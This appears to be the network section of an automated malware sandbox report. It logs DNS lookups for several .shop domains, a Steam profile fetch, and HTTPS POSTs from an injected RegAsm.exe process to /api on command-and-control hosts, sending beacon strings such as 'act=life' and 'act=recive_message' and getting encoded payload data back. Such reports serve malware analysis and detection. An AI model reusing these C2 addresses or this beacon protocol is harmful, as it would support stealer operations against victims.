Dec 18, 2024 11:40:12.803462982 CET	1.1.1.1	192.168.2.7	0x61c2	No error (0)	muggudrowiwm.shop		104.131.68.180	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:12.803462982 CET	1.1.1.1	192.168.2.7	0x61c2	No error (0)	muggudrowiwm.shop		178.62.201.34	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:12.803462982 CET	1.1.1.1	192.168.2.7	0x61c2	No error (0)	muggudrowiwm.shop		45.77.249.79	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:12.803482056 CET	1.1.1.1	192.168.2.7	0x61c2	No error (0)	muggudrowiwm.shop		104.131.68.180	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:12.803482056 CET	1.1.1.1	192.168.2.7	0x61c2	No error (0)	muggudrowiwm.shop		178.62.201.34	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:12.803482056 CET	1.1.1.1	192.168.2.7	0x61c2	No error (0)	muggudrowiwm.shop		45.77.249.79	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:14.621618986 CET	1.1.1.1	192.168.2.7	0x6f0b	Name error (3)	locatedblsoqp.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:14.769387007 CET	1.1.1.1	192.168.2.7	0xc3de	Name error (3)	traineiwnqo.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:14.913814068 CET	1.1.1.1	192.168.2.7	0xe5bd	Name error (3)	condedqpwqm.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:15.160310984 CET	1.1.1.1	192.168.2.7	0xc1bc	Name error (3)	evoliutwoqm.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:15.300769091 CET	1.1.1.1	192.168.2.7	0x156c	Name error (3)	millyscroqwp.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:15.447132111 CET	1.1.1.1	192.168.2.7	0x9e20	Name error (3)	stagedchheiqwo.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:15.683012009 CET	1.1.1.1	192.168.2.7	0x9253	Name error (3)	stamppreewntnq.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:15.912095070 CET	1.1.1.1	192.168.2.7	0x4336	Name error (3)	caffegclasiqwp.shop	none	none	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:16.056977987 CET	1.1.1.1	192.168.2.7	0xf8fb	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:18.602966070 CET	1.1.1.1	192.168.2.7	0x642e	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:40:18.602966070 CET	1.1.1.1	192.168.2.7	0x642e	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

muggudrowiwm.shop

steamcommunity.com

lev-tolstoi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	104.131.68.180	443	1412	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:40:14 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: muggudrowiwm.shop
2024-12-18 10:40:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-18 10:40:14 UTC	94	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:40:14 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49701	23.55.153.106	443	1412	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:40:17 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-18 10:40:18 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 18 Dec 2024 10:40:18 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=2060ba15b3da01f61b5a2d76; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-18 10:40:18 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-18 10:40:18 UTC	10097	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-18 10:40:18 UTC	10545	IN	Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 Data Ascii: NIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":"htt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49702	104.21.66.86	443	1412	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:40:19 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2024-12-18 10:40:19 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-18 10:40:20 UTC	1030	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:40:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e65jd747dhqop4a4stgfr589p1; expires=Sun, 13-Apr-2025 04:26:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0GyYtJiMiaxm%2F52EvLPmqhNgQ87JgA6YLEGb7HR5bYb1dHWiBSOH24AJa963Ird1gcCRSjIu4ATV7ChXMp2CW8aNnoezzTdXCcDhQe6KUwDJ2lrmElYLrD4TM1beiCP4zg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e88bd8a8341f5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1608&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1815920&cwnd=211&unsent_bytes=0&cid=10a4ec92338de674&ts=833&x=0"
2024-12-18 10:40:20 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 10:40:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49704	104.21.66.86	443	1412	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:40:22 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: lev-tolstoi.com
2024-12-18 10:40:22 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 62 76 6e 71 67 65 6d 78 66 79 79 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--bvnqgemxfyyo&j=
2024-12-18 10:40:22 UTC	1038	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:40:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g1qdpss99g6dosttvg2bt5mrlk; expires=Sun, 13-Apr-2025 04:27:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWgDvKG4Fc%2FIIMyMCe%2FmCr8lnAvvJ8u7LAMbTINPbVQRpCZDiToWxDqmxqwN9iwv9PKnnLik%2FOZGGKlQx5n0cVPbyF7aI8KCnhDprg2MnWZAgxyih%2F5W0%2BJKKm50DodBKHM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e88ccdde24259-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1573&rtt_var=615&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=953&delivery_rate=1744324&cwnd=233&unsent_bytes=0&cid=a065cc97ff5eebf6&ts=729&x=0"
2024-12-18 10:40:22 UTC	331	IN	Data Raw: 31 64 32 33 0d 0a 7a 32 48 67 74 47 59 65 6b 76 6e 33 34 58 42 33 6d 55 59 5a 4c 5a 46 30 2f 78 6e 68 33 70 55 74 77 44 51 46 73 36 6b 4e 6c 64 75 30 51 35 61 57 58 43 71 2b 32 34 53 45 55 6b 33 74 4e 47 78 49 76 56 61 65 66 63 50 6b 38 30 79 73 52 32 43 66 69 33 76 34 2b 66 55 48 67 64 67 56 65 37 37 62 6b 70 6c 53 54 63 49 39 4f 30 6a 2f 56 73 55 37 68 4c 54 33 54 4b 78 57 5a 4e 6a 47 66 66 6d 34 70 77 32 48 33 41 4e 39 39 70 69 62 6a 42 55 53 2f 43 64 7a 51 2f 67 5a 6c 33 54 44 38 72 64 49 75 68 59 2f 6b 65 52 6f 34 62 71 43 41 4a 50 66 52 47 4f 2b 67 74 57 45 48 6c 57 6a 5a 48 68 49 38 78 69 5a 66 59 71 32 2f 55 57 6b 56 32 48 5a 32 57 54 7a 73 36 63 44 68 4e 30 4a 64 4f 4b 56 6b 59 73 65 46 50 59 6e 4f 77 47 7a 45 59 55 37 32 2f 79 6b 66 61 46 48 64 Data Ascii: 1d23z2HgtGYekvn34XB3mUYZLZF0/xnh3pUtwDQFs6kNldu0Q5aWXCq+24SEUk3tNGxIvVaefcPk80ysR2Cfi3v4+fUHgdgVe77bkplSTcI9O0j/VsU7hLT3TKxWZNjGffm4pw2H3AN99pibjBUS/CdzQ/gZl3TD8rdIuhY/keRo4bqCAJPfRGO+gtWEHlWjZHhI8xiZfYq2/UWkV2HZ2WTzs6cDhN0JdOKVkYseFPYnOwGzEYU72/ykfaFHd
2024-12-18 10:40:22 UTC	1369	IN	Data Raw: 49 43 6f 2b 6c 37 69 53 53 6e 49 69 32 6a 37 2b 66 56 44 68 4e 67 46 63 66 43 4a 6e 59 67 5a 45 4f 6b 76 63 6b 4c 2b 46 70 42 78 6a 4c 2f 33 53 4b 68 63 61 4e 76 50 59 76 71 2f 72 51 50 43 6d 45 52 37 36 4e 76 4e 77 7a 45 51 36 79 4e 33 57 62 45 73 33 57 54 4e 70 62 64 49 72 68 59 2f 6b 63 4e 71 39 4c 71 6d 44 49 48 65 44 32 37 77 69 5a 4f 4f 46 77 66 39 49 58 56 46 38 41 53 58 64 59 57 2f 2f 6b 53 72 55 32 44 56 69 79 47 33 76 72 56 44 32 70 59 6c 63 66 75 58 6e 35 51 53 56 65 52 71 59 67 2f 30 47 74 30 6a 77 37 6a 32 53 36 4e 53 61 64 2f 50 59 2f 47 33 6f 41 79 45 33 41 52 37 2b 70 4f 64 67 68 38 65 39 43 52 2b 51 76 63 51 6b 58 71 47 2f 4c 6b 50 70 55 34 6e 69 59 74 42 38 4c 71 2f 51 62 66 56 43 6e 4c 33 6a 64 57 63 58 41 79 37 49 33 63 50 71 31 61 54 Data Ascii: ICo+l7iSSnIi2j7+fVDhNgFcfCJnYgZEOkvckL+FpBxjL/3SKhcaNvPYvq/rQPCmER76NvNwzEQ6yN3WbEs3WTNpbdIrhY/kcNq9LqmDIHeD27wiZOOFwf9IXVF8ASXdYW//kSrU2DViyG3vrVD2pYlcfuXn5QSVeRqYg/0Gt0jw7j2S6NSad/PY/G3oAyE3AR7+pOdgh8e9CR+QvcQkXqG/LkPpU4niYtB8Lq/QbfVCnL3jdWcXAy7I3cPq1aT
2024-12-18 10:40:22 UTC	1369	IN	Data Raw: 63 42 34 6c 46 2f 6b 5a 4d 76 78 71 36 6d 51 62 66 56 43 6e 4c 33 6a 64 57 63 58 41 79 37 49 33 63 50 71 31 61 51 63 34 61 35 2b 45 36 6f 57 47 4c 62 78 32 66 35 75 72 38 4d 68 74 59 49 64 50 71 57 6d 34 63 61 48 50 41 76 66 55 2f 79 48 4e 30 31 77 37 76 76 44 2f 6f 57 55 39 62 48 59 76 6a 37 6d 41 43 4d 32 41 4e 71 73 49 54 62 6d 6c 49 53 39 32 51 6a 44 2f 38 66 6e 58 43 4a 75 50 64 49 72 31 4e 6b 31 73 68 69 38 4c 4f 6a 42 49 62 61 44 58 48 32 6d 35 4b 48 46 77 66 2b 4c 58 64 44 73 31 6a 64 66 4a 76 38 72 77 2b 4e 55 58 48 53 35 47 7a 6d 73 4f 30 63 7a 4d 39 45 65 2f 7a 62 7a 63 4d 56 45 50 4d 76 66 55 66 7a 42 4a 68 31 69 4c 33 39 53 61 4e 62 61 39 66 4c 62 76 65 2f 6f 51 4f 46 30 52 5a 75 39 5a 32 48 69 56 4a 62 75 79 4e 6a 44 36 74 57 71 32 75 55 72 Data Ascii: cB4lF/kZMvxq6mQbfVCnL3jdWcXAy7I3cPq1aQc4a5+E6oWGLbx2f5ur8MhtYIdPqWm4caHPAvfU/yHN01w7vvD/oWU9bHYvj7mACM2ANqsITbmlIS92QjD/8fnXCJuPdIr1Nk1shi8LOjBIbaDXH2m5KHFwf+LXdDs1jdfJv8rw+NUXHS5GzmsO0czM9Ee/zbzcMVEPMvfUfzBJh1iL39SaNba9fLbve/oQOF0RZu9Z2HiVJbuyNjD6tWq2uUr
2024-12-18 10:40:22 UTC	1369	IN	Data Raw: 66 61 4e 6e 44 59 50 69 39 6f 77 57 45 32 77 46 7a 2b 6f 6d 64 6a 52 38 65 39 43 39 70 54 2f 34 53 6b 58 2b 4c 74 2f 30 50 37 42 5a 67 79 59 73 33 74 34 79 67 44 49 4c 56 45 6a 7a 76 31 59 7a 44 46 52 6d 37 66 44 74 44 2f 52 61 53 64 34 2b 33 2f 30 36 75 57 47 44 55 77 6d 66 2f 71 36 77 48 69 74 63 4b 63 2f 47 66 6b 49 59 57 45 76 38 69 64 41 2b 39 56 70 70 6a 77 2b 53 33 59 49 56 6a 4a 66 44 78 4c 2b 6a 33 74 45 4f 46 32 6b 51 6b 73 4a 65 57 6a 78 6f 61 2f 53 31 33 52 66 6f 64 6b 58 43 48 73 50 35 4b 70 46 64 69 31 4d 70 72 2b 37 4f 72 41 49 48 5a 43 33 50 34 32 39 76 44 46 51 32 37 66 44 74 71 35 42 32 54 66 63 4f 6a 75 56 62 69 55 57 75 52 6b 79 2f 37 73 4b 73 46 68 39 6f 46 65 76 69 65 6e 59 63 54 45 2f 30 6e 64 45 76 32 46 35 4a 2f 6a 37 4c 39 54 71 Data Ascii: faNnDYPi9owWE2wFz+omdjR8e9C9pT/4SkX+Lt/0P7BZgyYs3t4ygDILVEjzv1YzDFRm7fDtD/RaSd4+3/06uWGDUwmf/q6wHitcKc/GfkIYWEv8idA+9Vppjw+S3YIVjJfDxL+j3tEOF2kQksJeWjxoa/S13RfodkXCHsP5KpFdi1Mpr+7OrAIHZC3P429vDFQ27fDtq5B2TfcOjuVbiUWuRky/7sKsFh9oFevienYcTE/0ndEv2F5J/j7L9Tq
2024-12-18 10:40:22 UTC	1369	IN	Data Raw: 32 57 6a 34 76 61 6f 50 68 4e 6b 43 66 66 57 52 6d 59 51 58 48 76 51 6f 4f 77 47 7a 45 59 55 37 32 2f 7a 5a 52 4c 46 42 5a 4e 2f 41 65 65 7a 35 73 6b 32 62 6c 67 4e 77 73 4d 50 56 67 42 6b 65 2f 79 52 33 54 2f 63 62 6e 57 6d 4d 75 2f 42 47 71 55 52 74 31 73 78 6b 2f 37 4b 69 42 5a 44 61 43 6d 37 31 69 59 66 44 58 46 58 38 50 44 73 58 73 79 43 61 61 35 4f 2f 74 58 36 30 56 58 48 61 78 6d 4f 33 70 75 4d 61 77 74 45 49 50 4b 6a 62 6b 34 77 62 46 76 51 6c 63 6b 50 2b 45 35 52 2b 67 72 72 7a 52 61 68 57 59 64 66 4b 61 76 32 36 72 41 6d 4c 30 51 78 37 38 34 6e 56 7a 56 49 53 34 32 51 6a 44 39 6f 52 6a 33 57 54 2f 4f 67 42 75 78 5a 67 33 59 73 33 74 37 32 6e 44 49 62 52 43 48 72 31 6e 5a 69 43 48 52 54 37 4b 33 39 45 2b 68 43 63 64 6f 61 78 38 31 32 6f 58 57 6a Data Ascii: 2Wj4vaoPhNkCffWRmYQXHvQoOwGzEYU72/zZRLFBZN/Aeez5sk2blgNwsMPVgBke/yR3T/cbnWmMu/BGqURt1sxk/7KiBZDaCm71iYfDXFX8PDsXsyCaa5O/tX60VXHaxmO3puMawtEIPKjbk4wbFvQlckP+E5R+grrzRahWYdfKav26rAmL0Qx784nVzVIS42QjD9oRj3WT/OgBuxZg3Ys3t72nDIbRCHr1nZiCHRT7K39E+hCcdoax812oXWj
2024-12-18 10:40:22 UTC	1369	IN	Data Raw: 37 4f 6f 43 59 2f 56 43 33 2f 69 6d 70 4f 52 45 68 6a 78 4e 6e 46 45 39 68 75 51 64 6f 43 36 38 55 53 75 52 47 37 52 79 47 53 33 39 2b 30 45 6d 70 5a 63 50 4e 4f 4d 67 34 6b 56 47 65 30 76 65 6b 7a 6c 47 34 30 37 7a 66 7a 6d 53 4c 4d 57 50 38 66 62 65 50 43 6d 34 78 72 43 30 51 67 38 71 4e 75 54 69 68 51 53 2f 53 70 70 53 76 55 5a 6b 6e 4b 4b 75 50 39 4d 6f 6c 4a 6a 31 73 35 73 2b 37 4b 71 41 49 33 53 44 58 4c 35 6c 4e 58 4e 55 68 4c 6a 5a 43 4d 50 30 67 32 65 64 34 37 38 36 41 47 37 46 6d 44 64 69 7a 65 33 74 61 4d 47 67 74 77 43 65 50 57 64 6e 34 59 53 48 76 67 72 66 30 6e 33 47 5a 31 77 69 72 33 78 53 71 68 64 59 64 7a 49 61 66 48 35 34 30 4f 46 7a 6b 51 6b 73 4c 75 4f 6a 68 34 53 75 7a 73 31 56 72 4d 52 6b 54 76 62 2f 50 78 44 70 6c 46 6e 33 4d 68 6e Data Ascii: 7OoCY/VC3/impOREhjxNnFE9huQdoC68USuRG7RyGS39+0EmpZcPNOMg4kVGe0vekzlG407zfzmSLMWP8fbePCm4xrC0Qg8qNuTihQS/SppSvUZknKKuP9MolJj1s5s+7KqAI3SDXL5lNXNUhLjZCMP0g2ed4786AG7FmDdize3taMGgtwCePWdn4YSHvgrf0n3GZ1wir3xSqhdYdzIafH540OFzkQksLuOjh4Suzs1VrMRkTvb/PxDplFn3Mhn
2024-12-18 10:40:22 UTC	291	IN	Data Raw: 53 55 31 53 74 2f 34 5a 4c 56 7a 56 49 53 37 57 51 6a 44 38 31 57 6a 33 69 54 76 2f 68 65 6e 42 59 2f 79 50 55 76 2f 4b 2b 71 45 34 48 41 44 33 48 38 69 71 76 44 53 6b 47 70 64 69 6b 64 6f 51 6e 64 5a 4c 7a 79 74 30 37 69 44 6c 37 49 69 33 6d 33 34 66 39 4e 77 73 52 45 4a 4c 44 63 6c 70 45 41 45 2f 67 79 65 41 6a 4e 4b 4c 70 74 69 62 76 6e 53 4c 56 5a 4a 35 2b 4c 59 4c 66 68 6c 45 4f 4c 30 52 39 74 35 70 61 46 68 46 49 71 74 57 52 6a 44 36 74 57 71 48 69 4e 73 76 42 5a 73 78 74 41 78 38 46 6f 35 37 36 36 44 4d 4b 59 52 48 71 77 77 38 62 4e 55 68 48 71 5a 43 4d 66 6f 55 33 49 4b 4e 54 73 70 56 44 73 54 79 66 48 69 7a 65 6c 39 2b 30 52 77 6f 35 45 4f 2f 4f 4a 68 34 55 52 41 2f 68 6a 52 58 48 55 44 4a 42 39 6c 4b 33 4a 63 61 56 4d 61 74 66 63 66 72 75 73 72 Data Ascii: SU1St/4ZLVzVIS7WQjD81Wj3iTv/henBY/yPUv/K+qE4HAD3H8iqvDSkGpdikdoQndZLzyt07iDl7Ii3m34f9NwsREJLDclpEAE/gyeAjNKLptibvnSLVZJ5+LYLfhlEOL0R9t5paFhFIqtWRjD6tWqHiNsvBZsxtAx8Fo5766DMKYRHqww8bNUhHqZCMfoU3IKNTspVDsTyfHizel9+0Rwo5EO/OJh4URA/hjRXHUDJB9lK3JcaVMatfcfrusr
2024-12-18 10:40:22 UTC	1369	IN	Data Raw: 32 62 66 39 0d 0a 67 78 39 6f 69 30 4b 4f 67 42 5a 58 48 52 44 4b 77 6e 64 58 62 51 6c 75 37 49 47 6f 50 71 30 62 50 49 4e 62 76 6f 42 2f 77 53 53 6e 49 69 33 6d 33 34 66 39 4e 77 73 52 45 4a 4c 44 63 6c 70 45 41 45 2f 67 79 65 41 6a 4e 4b 4c 4e 38 68 62 6e 77 58 2b 42 34 62 4d 58 4d 4c 37 6e 35 6f 6b 50 61 37 30 51 30 73 4b 54 62 77 77 70 56 6f 32 52 4f 54 50 30 59 6d 6d 32 53 38 64 6c 49 70 46 4e 67 77 59 6c 42 2f 4b 32 71 51 38 79 57 41 6a 79 6f 79 39 76 44 46 67 53 37 66 43 73 64 71 45 50 4f 4c 4e 50 75 36 41 47 37 46 6e 47 52 6b 7a 32 35 2b 62 39 44 32 70 5a 44 66 2b 4b 4a 6b 34 41 45 46 72 77 61 52 55 7a 6c 47 35 4a 77 67 6f 4c 4a 59 61 39 58 5a 4e 2b 4a 58 75 47 30 76 51 43 48 30 54 70 43 2f 70 79 42 68 42 77 54 2b 32 51 31 44 2f 78 57 78 55 4c 44 Data Ascii: 2bf9gx9oi0KOgBZXHRDKwndXbQlu7IGoPq0bPINbvoB/wSSnIi3m34f9NwsREJLDclpEAE/gyeAjNKLN8hbnwX+B4bMXML7n5okPa70Q0sKTbwwpVo2ROTP0Ymm2S8dlIpFNgwYlB/K2qQ8yWAjyoy9vDFgS7fCsdqEPOLNPu6AG7FnGRkz25+b9D2pZDf+KJk4AEFrwaRUzlG5JwgoLJYa9XZN+JXuG0vQCH0TpC/pyBhBwT+2Q1D/xWxULD
2024-12-18 10:40:22 UTC	1369	IN	Data Raw: 49 4f 4e 34 4f 51 4f 71 54 75 2f 56 47 64 6d 42 30 38 35 74 76 4e 30 56 78 56 36 57 51 6a 44 37 51 56 6a 32 6d 46 76 2b 46 4d 35 57 68 5a 39 73 56 6f 39 71 2b 39 44 6f 37 33 42 32 33 36 70 61 75 57 45 52 76 31 49 32 31 65 73 31 6a 64 64 4d 50 6b 7a 67 2f 71 46 6c 69 66 69 33 65 33 34 65 30 32 67 64 67 4b 65 2b 61 4b 32 4b 51 63 45 76 6f 79 61 30 4c 2f 4e 35 35 71 69 66 79 35 44 36 51 57 50 34 4f 46 4c 2f 4f 6f 37 56 76 53 68 46 38 70 6f 38 7a 46 30 51 31 62 34 6d 52 74 44 36 74 45 30 7a 75 52 2f 4b 38 50 35 56 56 31 77 38 31 73 34 62 72 71 50 62 7a 7a 45 33 2f 67 6e 5a 61 39 4c 44 37 33 49 6e 78 56 39 42 43 37 57 38 50 79 74 30 44 69 44 6c 36 52 67 79 2f 49 39 2b 30 62 77 6f 35 45 53 66 4f 56 6d 34 51 45 42 4c 59 42 62 45 7a 6a 45 4a 34 37 7a 66 7a 78 44 Data Ascii: 